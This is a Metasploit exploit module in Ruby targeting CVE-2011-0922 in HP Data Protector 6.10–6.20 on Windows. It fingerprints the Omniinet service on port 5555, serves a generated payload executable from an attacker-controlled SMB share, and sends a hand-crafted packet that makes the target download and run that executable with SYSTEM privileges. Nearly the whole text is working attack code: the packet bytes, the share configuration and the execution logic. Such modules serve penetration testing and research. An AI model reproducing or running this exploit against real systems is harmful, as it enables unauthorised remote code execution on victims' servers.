HP Data Protector 6.10 / 6.11 / 6.20 Install Service

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::SMB::Server::Share  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service',  
'Description' => %q{  
This module exploits HP Data Protector Omniinet process on Windows only.  
This exploit invokes the install service function which allows an attacker to create a  
custom payload in the format of an executable.  
  
To ensure this works, the SMB server created in MSF must have a share called Omniback  
which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\  
},  
'Author' => [  
'Ben Turner',  
],  
'References' =>  
[  
['CVE', '2011-0922'],  
['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 2048,  
'DisableNops' => true  
},  
'Privileged' => true,  
'Platform' => 'win',  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Targets' =>  
[  
[ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 02 2011'))  
  
register_options(  
[  
Opt::RPORT(5555),  
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])  
], self.class)  
  
deregister_options('FOLDER_NAME')  
deregister_options('FILE_CONTENTS')  
deregister_options('SHARE')  
deregister_options('FILE_NAME')  
end  
  
def peer  
"#{rhost}:#{rport}"  
end  
  
def check  
fingerprint = get_fingerprint  
  
if fingerprint.nil?  
vprint_status('Unable to fingerprint because no response.')  
return Exploit::CheckCode::Unknown  
end  
  
vprint_status("#{peer} - #{fingerprint}")  
  
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/i  
return Exploit::CheckCode::Appears  
else  
return Exploit::CheckCode::Safe  
end  
  
Exploit::CheckCode::Detected  
end  
  
def get_fingerprint  
ommni = connect  
ommni.put(rand_text_alpha_upper(64))  
resp = ommni.get_once(-1)  
disconnect  
  
return nil if resp.nil?  
  
# Delete unicode last null  
Rex::Text.to_ascii(resp).chop.chomp  
end  
  
def primer  
self.file_contents = generate_payload_exe  
self.file_name = "installservice.exe"  
self.share = "Omniback\\i386"  
  
print_status("File available on #{unc}...")  
vprint_status("#{peer} - Trying to execute remote EXE...")  
  
lhost = "#{datastore['SRVHOST']}"  
lhostfull = ""  
lhost.each_char do |character|  
lhostfull = lhostfull << "\x00" << character  
end  
  
packet = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"  
packet << lhostfull  
packet << "\x00\x00\x00\x20\x00\x30\x00"  
packet << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"  
packet << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"  
packet << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"  
packet << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"  
packet << "\x5c"  
packet << lhostfull  
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"  
packet << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"  
packet << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"  
packet << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"  
packet << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"  
packet << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"  
packet << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"  
packet << lhostfull  
packet << "\x5c\x00\x5c\x00\x4f\x00"  
packet << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"  
packet << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"  
packet << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"  
packet << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"  
packet << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"  
packet << "\x5c\x00\x5c"  
packet << lhostfull  
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"  
packet << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"  
packet << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"  
packet << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"  
packet << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"  
packet << lhostfull  
packet << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"  
packet << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"  
  
connect  
sock.put(packet)  
disconnect  
end  
  
def exploit  
begin  
Timeout.timeout(datastore['SMB_DELAY']) {super}  
rescue Timeout::Error  
# Stop SMB Server  
end  
end  
end  
`